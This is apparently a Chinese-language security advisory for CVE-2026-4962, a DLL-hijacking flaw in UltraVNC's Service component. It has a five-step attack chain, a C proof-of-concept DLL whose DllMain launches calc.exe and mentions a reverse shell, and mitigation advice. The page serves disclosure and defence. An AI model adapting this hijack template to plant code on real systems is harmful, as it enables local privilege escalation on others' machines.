CVE-2026-4962 CVSS 7.0 高危

CVE-2026-4962 UltraVNC未控制搜索路径漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4962

漏洞类型

DLL劫持/未控制的搜索路径

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

UltraVNC

漏洞概述

UltraVNC 1.6.4.0及之前版本存在严重的安全漏洞，涉及Service组件中version.dll库的未控制搜索路径问题。由于未正确指定DLL加载路径，攻击者可在本地利用该漏洞，通过放置恶意文件劫持DLL加载过程。该攻击无需用户交互，且只需低权限即可触发，成功利用可导致系统机密性、完整性和可用性全面受损。目前厂商尚未对此漏洞做出响应。

技术细节

该漏洞的核心在于Windows系统对DLL搜索路径的处理机制。当UltraVNC Service组件尝试加载version.dll时，如果未使用绝对路径或安全加载标志，Windows会按预设顺序查找文件。攻击者利用这一机制，将恶意构造的version.dll文件放置在应用程序的当前工作目录或搜索路径优先级较高的位置。由于攻击向量为本地且需要低权限，攻击者需具备文件写入能力。一旦服务重启或调用该组件，系统将加载恶意DLL，从而在服务上下文中执行任意代码，实现权限提升或系统破坏。尽管利用复杂度较高，但公开的利用代码增加了风险。

攻击链分析

STEP 1

侦察与识别

攻击者确认目标系统上安装了UltraVNC 1.6.4.0或更早版本，并确认Service组件正在运行。

STEP 2

恶意文件准备

攻击者编写并编译一个恶意的version.dll文件，该文件包含旨在在系统上执行的恶意载荷。

STEP 3

放置载荷

利用本地低权限，攻击者将恶意的version.dll文件复制到UltraVNC服务的当前工作目录或搜索路径优先的位置。

STEP 4

触发漏洞

等待服务自动重启，或通过某种方式诱导服务重启（如系统重启），使得Service组件重新加载DLL。

STEP 5

执行攻击

系统加载恶意的version.dll而非系统库，从而以服务权限执行攻击者预设的代码，导致系统被控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdlib.h>

// Entry point for the malicious DLL
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Code to execute when the DLL is loaded by the vulnerable process
        // Example: Spawning a calculator or reverse shell
        system("calc.exe");
        // Or use WinExec, CreateProcess, etc. for more complex payloads
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Exported functions to match the target DLL (version.dll) if necessary
// This might depend on the actual dependencies of the target application
extern "C" __declspec(dllexport) void GetFileVersionInfoA() {}
extern "C" __declspec(dllexport) void GetFileVersionInfoSizeA() {}

影响范围

UltraVNC <= 1.6.4.0

防御指南

临时缓解措施

建议立即限制对UltraVNC程序目录的写入访问权限，仅允许管理员和系统账户修改。可以通过组策略或文件系统ACL（访问控制列表）来实现。此外，启用系统的CWDIllegalInDllSearch注册表项，防止应用程序从当前工作目录加载DLL，从而阻断此类劫持攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4962
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4962
3 Details https://www.cvedetails.com/cve/CVE-2026-4962/
4 VulDB https://vuldb.com/cve/CVE-2026-4962
5 Link https://drive.google.com/file/d/1QC-MrqGsfjr4phEN77krLFZHQN8S48U_/view
6 Link https://vuldb.com/?ctiid.353839
7 Link https://vuldb.com/?id.353839
8 Link https://vuldb.com/?submit.777619

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表